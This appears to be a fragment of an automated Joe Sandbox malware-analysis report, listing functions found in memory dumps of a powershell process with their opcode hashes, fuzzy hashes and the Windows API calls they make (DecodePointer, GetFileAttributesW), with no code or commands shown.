                                                                  • Opcode ID: d5e51ee73064b7e889f73ab5dd394531f1991cd1adcea132bcbac3771ca107c6
                                                                  • Instruction ID: 445c8afd19e30650eb9c2db6674b3ba6e50b42327236ef188322177d47ed8ae4
                                                                  • Opcode Fuzzy Hash: d5e51ee73064b7e889f73ab5dd394531f1991cd1adcea132bcbac3771ca107c6
                                                                  • Instruction Fuzzy Hash: DE034A71A0411C8FEB25EB60C890BDE77BAAF89714F1150E9D20A6F260DF309E85DF56
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

[Control-flow graph rendering omitted: function at 0xa05739 with alternate entry path through 0xa056d9; RtlDecodePointer is called in block 0xa0583c-0xa0585f.]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.428231811.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_a00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID:
                                                                  • API String ID: 3527080286-0
                                                                  • Opcode ID: 50d38899a3d435560e4ad5aec015da3702f40542cb2313dca840373f569f6ccc
                                                                  • Instruction ID: 7ffcdf2285667f10e84d427956c975d393e4e876ec8c6853575129122a73892f
                                                                  • Opcode Fuzzy Hash: 50d38899a3d435560e4ad5aec015da3702f40542cb2313dca840373f569f6ccc
                                                                  • Instruction Fuzzy Hash: A6418AB0D04B488EEB50DF7AD4887DABBF2EB84314F28C46DD8099B291D7755845DF60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

[Control-flow graph rendering omitted: function at 0xa05748; RtlDecodePointer is called in block 0xa0583c-0xa0585f.]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.428231811.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_a00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID:
                                                                  • API String ID: 3527080286-0
                                                                  • Opcode ID: 57a21c54d675187cf667bb0fd1e41bf6e095a2e49eaefd78ed0cfe95406fd38c
                                                                  • Instruction ID: a18101c06d9091241fad0f4b64132dc3cfb0c4f69946cb4b1fe8097f827cc2a2
                                                                  • Opcode Fuzzy Hash: 57a21c54d675187cf667bb0fd1e41bf6e095a2e49eaefd78ed0cfe95406fd38c
                                                                  • Instruction Fuzzy Hash: A82187B4D04B488EEB20CF7AD48838AFBF6AB84310F28C42DC85997285D7746885CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

[Control-flow graph rendering omitted: function at 0x2ff42a0; GetFileAttributesW is called in block 0x2ff5012-0x2ff503d.]
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 02FF5030
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5321c7a361d11f8e31a61722fb78e7cca4385767e0630afcb15f8bc43216d644
                                                                  • Instruction ID: 786fe06e69a5850610315b95187559bce775084239c42e678f8d7e6efc10aacd
                                                                  • Opcode Fuzzy Hash: 5321c7a361d11f8e31a61722fb78e7cca4385767e0630afcb15f8bc43216d644
                                                                  • Instruction Fuzzy Hash: 1D2136B1D0461A9BCB10CF9AD44479EFBF4FF48654F10812AEA18B7650D774A900CFE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

[Control-flow graph rendering omitted: function at 0x2ff4fb9; GetFileAttributesW is called in block 0x2ff5012-0x2ff503d.]
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 02FF5030
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 6d32a7b8980e47d75507f3242bedd45f56516544b7064d517f3db5dd7d745663
                                                                  • Instruction ID: 63720d1c00d74a3671d3d815975ddee940483252e0bc884c6ef590c1bcc99ce2
                                                                  • Opcode Fuzzy Hash: 6d32a7b8980e47d75507f3242bedd45f56516544b7064d517f3db5dd7d745663
                                                                  • Instruction Fuzzy Hash: AD2136B1D0425A9BCB10CFAAD44479EFBF4BF48714F14816AE918B7640C774A904CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: 6914d7fc85597290b4d3d99efea8b7d7ec94cacf9366d85114dff00bd33ecf27
                                                                  • Instruction ID: 9ba715c241d3b81ae79a2f293dce5c6dc4ad8854ef0a17b51de090b38be75c96
                                                                  • Opcode Fuzzy Hash: 6914d7fc85597290b4d3d99efea8b7d7ec94cacf9366d85114dff00bd33ecf27
                                                                  • Instruction Fuzzy Hash: 41329E34A046058FE714DF64C480A6ABBF2FF89354F25C5A9DA5A9B3A5CB34EC41CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%